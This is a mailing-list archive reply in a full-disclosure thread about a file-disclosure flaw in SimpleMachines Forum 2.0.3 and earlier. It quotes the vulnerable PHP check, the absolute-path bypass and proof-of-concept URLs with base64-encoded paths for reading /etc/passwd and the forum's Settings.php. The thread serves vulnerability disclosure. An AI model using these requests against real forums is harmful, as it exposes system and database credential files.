oss-sec mailing list archives
Re: [Full-disclosure] File Disclosure in SimpleMachines Forum <= 2.0.3
From: WHK Yan <yan.uniko.102 () gmail com>
Date: Tue, 8 Jan 2013 10:36:23 -0300
The flaw is not exploitable without privileges. On some occasions there are forums where there are co-admistrators which have privileges to view the error log but not to modify code or at least read the mysql connection. Not have CVE-ID. 2013/1/8 Carlos Alberto Lopez Perez <clopez () igalia com>
On 07/01/13 15:54, WHK Yan wrote:*Summary:* -------------- A security flaw allows an attacker to know the full source file of thewebsystem. *Details: ----------- Sources/ManageErrors.php Line 340: // Make sure the file we are looking for is one they are allowed to lookatif (!is_readable($file) || (strpos($file, '../') !== false && ( strpos($file, $boarddir) === false || strpos($file, $sourcedir) ===false)))fatal_lang_error('error_bad_file', true, array(htmlspecialchars($file))); Bypass function strpos($file, '../'), no need "../", example: /home/foo/www/Settings.php *PoC: -------http://test.con/forum/index.php?action=admin;area=logs;sa=errorlog;file=L2V0Yy9wYXNzd2Q=Read /etc/passwd works with path disclosure for read Settings.php: http://whk.drawcoders.net/index.php/topic,2792.0.html *Reproduce: 1. Open http://example.com/forumpath/SSI.php?ssi_function=fetchPosts 2. Get full path of web app ( /home/1337/public_html/SSI.php ). 3. Exploit in base64:http://test.con/forum/index.php?action=admin;area=logs;sa=errorlog;file=L2hvbWUvc3BhZG1pbi9wdWJsaWNfaHRtbC9TZXR0aW5ncy5waHA=To read /home/spadmin/public_html/Settings.php Referer and Mirror: ------------------------- http://whk.drawcoders.net/index.php/topic,2805.0.html _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/Hi! I have verified SMF is affected by this issue. The PoC requires an admin login to be exploited. Is there any possibility to exploit this issue without an admin login? I guess a CVE should be assigned. Do you already asked for one?
Current thread:
- Re: [Full-disclosure] File Disclosure in SimpleMachines Forum <= 2.0.3 Carlos Alberto Lopez Perez (Jan 08)
- Re: [Full-disclosure] File Disclosure in SimpleMachines Forum <= 2.0.3 WHK Yan (Jan 08)
- Re: Re: [Full-disclosure] File Disclosure in SimpleMachines Forum <= 2.0.3 Kurt Seifried (Jan 08)
- Re: Re: [Full-disclosure] File Disclosure in SimpleMachines Forum <= 2.0.3 WHK Yan (Jan 08)
- Re: Re: [Full-disclosure] File Disclosure in SimpleMachines Forum <= 2.0.3 Kurt Seifried (Jan 08)
- Message not available
- Re: Re: [Full-disclosure] File Disclosure in SimpleMachines Forum <= 2.0.3 Carlos Alberto Lopez Perez (Jan 11)
- Re: Re: [Full-disclosure] File Disclosure in SimpleMachines Forum <= 2.0.3 Kurt Seifried (Jan 16)
- Re: Re: [Full-disclosure] File Disclosure in SimpleMachines Forum <= 2.0.3 Kurt Seifried (Jan 08)
- Re: [Full-disclosure] File Disclosure in SimpleMachines Forum <= 2.0.3 WHK Yan (Jan 08)